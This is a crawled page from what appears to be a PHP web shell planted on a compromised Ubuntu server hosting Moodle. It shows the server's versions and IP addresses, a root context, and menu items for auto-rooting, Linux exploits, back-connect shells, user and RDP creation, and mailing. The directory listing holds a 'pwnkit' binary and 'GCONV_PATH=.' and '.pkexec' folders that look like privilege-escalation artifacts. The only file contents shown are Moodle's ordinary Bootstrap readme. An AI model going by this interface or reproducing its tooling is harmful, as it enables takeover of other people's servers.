Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
theme /
boost /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxrwxr-x
classes
[ DIR ]
drwxrwxr-x
cli
[ DIR ]
drwxrwxr-x
lang
[ DIR ]
drwxrwxr-x
layout
[ DIR ]
drwxrwxr-x
pix
[ DIR ]
drwxrwxr-x
scss
[ DIR ]
drwxrwxr-x
style
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
config.php
5.38
KB
-rw-rw-r--
lib.php
4.79
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
readme_moodle.txt
1.58
KB
-rw-rw-r--
settings.php
3.92
KB
-rw-rw-r--
thirdpartylibs.xml
2.98
KB
-rw-rw-r--
upgrade.txt
2.87
KB
-rw-rw-r--
version.php
990
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
Description of Twitter bootstrap import into Moodle Twitter bootstrap ----------------- Sass: This theme uses the version 4.0.0 Twitter bootstrap sass files. The bootstrap repository is available on: https://github.com/twitter/bootstrap.git To update to the latest release of twitter bootstrap: * remove all files from scss/bootstrap, * download the new scss files and store them in scss/bootstrap * re-apply /* rtl:begin:ignore */ on the top of _popover.scss before .popover rule and /* rtl:end:ignore */ before .popover-arrow::after rule. See MDL-56763 commit (1a4faf9b). * comment out all uses of the @supports syntax in SCSS (see https://github.com/sabberworm/PHP-CSS-Parser/issues/127). In Bootstrap 4.0 The @supports rules are used for carousal transitions (nice sliding) and the .sticky-top helper class. The carousel bootstrap component will still be functional. * update ./thirdpartylibs.xml Javascript: This theme uses the transpiled javascript from bootstrap4 as amd modules. To update the javascript files: Checkout the latest branch of bootstrap to a folder, Run the follwing inside the cloned Bootstrap repository: ``` $ npm install @babel/cli@7.0.0-beta.37 @babel/preset-env@7.0.0-beta.37 babel-plugin-transform-es2015-modules-amd @babel/plugin-proposal-object-rest-spread $ mkdir out $ ./node_modules/@babel/cli/bin/babel.js --presets @babel/preset-env --plugins transform-es2015-modules-amd,@babel/plugin-proposal-object-rest-spread -d ./out/ js/src/ ``` Copy the transpiled files from out/ into the amd/src/ folder for the theme. Run grunt to re-compile the JS files. (thanks to Joby Harding)
Close